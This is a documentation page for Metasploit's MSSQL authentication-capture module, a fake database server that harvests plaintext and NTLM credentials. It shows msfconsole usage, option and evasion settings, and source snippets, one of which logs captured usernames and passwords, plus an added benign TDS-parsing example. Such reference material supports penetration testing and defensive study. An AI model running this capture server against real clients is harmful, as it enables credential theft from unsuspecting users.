Authentication Capture: MSSQL - Metasploit
This page contains detailed information about how to use the auxiliary/server/capture/mssql Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Authentication Capture: MSSQL
Module: auxiliary/server/capture/mssql
Source code: modules/auxiliary/server/capture/mssql.rb
Disclosure date: -
Last modification time: 2021-01-28 10:35:25 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module provides a fake MSSQL service that is designed to capture authentication credentials. The module supports both the weakly encoded database logins and Windows logins (NTLM).
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/capture/mssql
msf auxiliary(mssql) > show targets
... a list of targets ...
msf auxiliary(mssql) > set TARGET target-id
msf auxiliary(mssql) > show options
... show and set options ...
msf auxiliary(mssql) > exploit
Msfconsole Usage
Here is how the server/capture/mssql auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/capture/mssql
msf6 auxiliary(server/capture/mssql) > show info
       Name: Authentication Capture: MSSQL
     Module: auxiliary/server/capture/mssql
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Patrik Karlsson <patrik[at]cqure.net>

Available actions:
  Name     Description
  ----     -----------
  Capture  Run MSSQL capture server

Check supported:
  No

Basic options:
  Name        Current Setting   Required  Description
  ----        ---------------   --------  -----------
  CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
  CHALLENGE   1122334455667788  yes       The 8 byte challenge
  JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
  SRVHOST     0.0.0.0           yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT     1433              yes       The local port to listen on.

Description:
  This module provides a fake MSSQL service that is designed to
  capture authentication credentials. The modules supports both the
  weak encoded database logins as well as Windows logins (NTLM).
Module Options
This is a complete list of options available in the server/capture/mssql auxiliary module:
msf6 auxiliary(server/capture/mssql) > show options
Module options (auxiliary/server/capture/mssql):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST     0.0.0.0           yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     1433              yes       The local port to listen on.

Auxiliary action:

   Name     Description
   ----     -----------
   Capture  Run MSSQL capture server
Advanced Options
Here is a complete list of advanced options supported by the server/capture/mssql auxiliary module:
msf6 auxiliary(server/capture/mssql) > show advanced
Module advanced options (auxiliary/server/capture/mssql):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   DOMAIN_NAME             anonymous        yes       The domain name used during smb exchange with smb extended security set
   ListenerComm                             no        The specific communication channel to use for this service
   SMBServerIdleTimeout    120              yes       The maximum amount of time to keep an idle session open in seconds
   SMBServerMaximumBuffer  2                yes       The maximum number of data in megabytes to buffer
   SMB_EXTENDED_SECURITY   false            yes       Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/capture/mssql module can do:
msf6 auxiliary(server/capture/mssql) > show actions
Auxiliary actions:

   Name     Description
   ----     -----------
   Capture  Run MSSQL capture server
Evasion Options
Here is the full list of evasion options supported by the server/capture/mssql auxiliary module, used to evade defenses (e.g. antivirus, EDR, firewalls, NIDS):
msf6 auxiliary(server/capture/mssql) > show evasion
Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maximum tcp segment size. (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
- CHALLENGE syntax must match 1122334455667788
- Login packet to short
- Failed to find NTLMSSP authentication blob
- Error processing Hash from <SMB:NAME> : <E.CLASS> <E> <E.BACKTRACE>
- Unsupported NTLM authentication message type
- unsupported token: <TOKEN>
- <INFO:ERRORS>
- Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
- Login failed for user '<INFO:USER>'.
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
CHALLENGE syntax must match 1122334455667788
Here is a relevant code snippet related to the "CHALLENGE syntax must match 1122334455667788" error message:
    @s_smb_esn = datastore['SMB_EXTENDED_SECURITY']
    @domain_name = datastore['DOMAIN_NAME']
    if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
      @challenge = [ datastore['CHALLENGE'] ].pack("H*")
    else
      print_error("CHALLENGE syntax must match 1122334455667788")
      return
    end

    # those variables will prevent to spam the screen with identical hashes (works only with ntlmv1)
    @previous_lm_hash="none"
Login packet to short
Here is a relevant code snippet related to the "Login packet to short" error message:
  def mssql_parse_login(data, info)
    status = data.slice!(0,1).unpack('C')[0]
    len = data.slice!(0,2).unpack('n')[0]

    if len > data.length + 4
      info[:errors] << "Login packet to short"
      return
    end

    # slice of:
    # * channel, packetno, window
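The snippet above rejects a LOGIN7 packet whose declared length exceeds the bytes actually received, which is what produces the "Login packet to short" message. The following Ruby is an added example, not code from the module or from Metasploit, that applies the same sanity check to a standalone TDS packet header so the failure mode can be reproduced offline. The 8-byte header layout (type, status, big-endian length including the header, spid, packet id, window) is the documented TDS framing; the function names, the TDS_MSG_LOGIN value and the sample packets are constructed for this example.

```ruby
# Added example (not the module's own code): parse a raw TDS packet header
# and refuse the payload when the client-declared length cannot be trusted.
#
# TDS packet header (8 bytes):
#   type(1) status(1) length(2, big-endian, includes header) spid(2) packet_id(1) window(1)
TDS_HEADER_LEN = 8
TDS_MSG_LOGIN  = 0x10   # LOGIN7 packet type (constructed constant for this example)

# Parse one TDS packet. Returns a hash with :type, :status, :length, :payload
# and an :errors array; :errors is non-empty when the header is unusable.
def parse_tds_packet(raw)
  info = { errors: [] }

  if raw.bytesize < TDS_HEADER_LEN
    info[:errors] << "Packet shorter than TDS header"
    return info
  end

  type, status, length, _spid, _packet_id, _window = raw.unpack('CCnnCC')
  info[:type]   = type
  info[:status] = status
  info[:length] = length

  # The same condition the capture module applies: the header claims more
  # bytes than were delivered, so the payload must not be parsed.
  if length > raw.bytesize
    info[:errors] << "Login packet to short"   # wording kept identical to the module message
    return info
  end

  info[:payload] = raw.byteslice(TDS_HEADER_LEN, length - TDS_HEADER_LEN)
  info
end

# Build a well-formed packet around a payload (constructed test data, not captured traffic).
def build_tds_packet(type, payload)
  header = [type, 0x01, TDS_HEADER_LEN + payload.bytesize, 0, 1, 0].pack('CCnnCC')
  header + payload
end

if __FILE__ == $0
  good = build_tds_packet(TDS_MSG_LOGIN, "\x00" * 20)
  p parse_tds_packet(good)[:errors]           # => []
  # Truncate the packet: the header still claims 28 bytes but only 15 arrived.
  truncated = good.byteslice(0, 15)
  p parse_tds_packet(truncated)[:errors]      # => ["Login packet to short"]
end
```

The check compares the declared length against the whole buffer rather than the remaining payload, which is equivalent to the module's `len > data.length + 4` once the four header bytes it has already sliced off are accounted for.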
Failed to find NTLMSSP authentication blob
Here is a relevant code snippet related to the "Failed to find NTLMSSP authentication blob" error message:
  def mssql_parse_ntlmsspi(data, info)
    start = data.index('NTLMSSP')
    if start
      data.slice!(0,start)
    else
      print_error("Failed to find NTLMSSP authentication blob")
      return
    end

    ntlm_message = NTLM_MESSAGE::parse(data)
    case ntlm_message
Error processing Hash from <SMB:NAME> : <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error processing Hash from <SMB:NAME> : <E.CLASS> <E> <E.BACKTRACE>" error message:
        arg[:host] = info[:ip]

        begin
          mssql_get_hash(arg)
        rescue ::Exception => e
          print_error("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
        end
      else
        info[:errors] << "Unsupported NTLM authentication message type"
      end

Unsupported NTLM authentication message type
Here is a relevant code snippet related to the "Unsupported NTLM authentication message type" error message:
          mssql_get_hash(arg)
        rescue ::Exception => e
          print_error("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
        end
      else
        info[:errors] << "Unsupported NTLM authentication message type"
      end

      # slice of remainder
      data.slice!(0,data.length)
    end
unsupported token: <TOKEN>
Here is a relevant code snippet related to the "unsupported token: <TOKEN>" error message:
          info[:type] = Constants::TDS_MSG_PRELOGIN
        when Constants::TDS_MSG_SSPI
          mssql_parse_ntlmsspi(data, info)
          info[:type] = Constants::TDS_MSG_SSPI
        else
          info[:errors] << "unsupported token: #{token}"
        end
      end
      info
    end

<INFO:ERRORS>
Here is a relevant code snippet related to the "<INFO:ERRORS>" error message:
    return if not data

    info = mssql_parse_reply(data, info)

    if(info[:errors] and not info[:errors].empty?)
      print_error("#{info[:errors]}")
      c.close
      return
    end

    # no errors, and the packet was a prelogin
Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
Here is a relevant code snippet related to the "Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication." error message:
    case info[:type]
    when Constants::TDS_MSG_PRELOGIN
      mssql_send_prelogin_response(c, info)

    when Constants::TDS_MSG_SSPI
      mssql_send_error(c, "Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.")

    when Constants::TDS_MSG_LOGIN
      if info[:isntlm?] == true
        mssql_send_ntlm_challenge(c, info)
      elsif info[:user] and info[:pass]
Login failed for user '<INFO:USER>'.
Here is a relevant code snippet related to the "Login failed for user '<INFO:USER>'." error message:
          :source_type => "captured",
          :active => true
        )

        print_status("MSSQL LOGIN #{@state[c][:name]} #{info[:user]} / #{info[:pass]}")
        mssql_send_error(c, "Login failed for user '#{info[:user]}'.")

        c.close
      end
    end
  end
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #9897 Merged Pull Request: Fix #8404 ListenerComm Support For Exploit::Remote::TcpServer
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #4768 Merged Pull Request: Reorganize SMB mixins
- #2525 Merged Pull Request: Change module boilerplate
- #602 Merged Pull Request: Review of pull request #598
See Also
Check also the following modules related to this module:
- auxiliary/server/capture/drda
- auxiliary/server/capture/ftp
- auxiliary/server/capture/http
- auxiliary/server/capture/http_basic
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/capture/imap
- auxiliary/server/capture/mysql
- auxiliary/server/capture/pop3
- auxiliary/server/capture/postgresql
- auxiliary/server/capture/printjob_capture
- auxiliary/server/capture/sip
- auxiliary/server/capture/smb
- auxiliary/server/capture/smtp
- auxiliary/server/capture/telnet
- auxiliary/server/capture/vnc
- auxiliary/admin/mssql/mssql_enum
- auxiliary/admin/mssql/mssql_enum_domain_accounts
- auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
- auxiliary/admin/mssql/mssql_enum_sql_logins
- auxiliary/admin/mssql/mssql_escalate_dbowner
- auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
- auxiliary/admin/mssql/mssql_escalate_execute_as
- auxiliary/admin/mssql/mssql_escalate_execute_as_sqli
- auxiliary/admin/mssql/mssql_exec
- auxiliary/admin/mssql/mssql_findandsampledata
- auxiliary/admin/mssql/mssql_idf
- auxiliary/admin/mssql/mssql_ntlm_stealer
- auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
- auxiliary/admin/mssql/mssql_sql
- auxiliary/admin/mssql/mssql_sql_file
- auxiliary/scanner/mssql/mssql_hashdump
- auxiliary/scanner/mssql/mssql_login
- auxiliary/scanner/mssql/mssql_ping
- auxiliary/scanner/mssql/mssql_schemadump
Authors
Patrik Karlsson <patrik[at]cqure.net>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.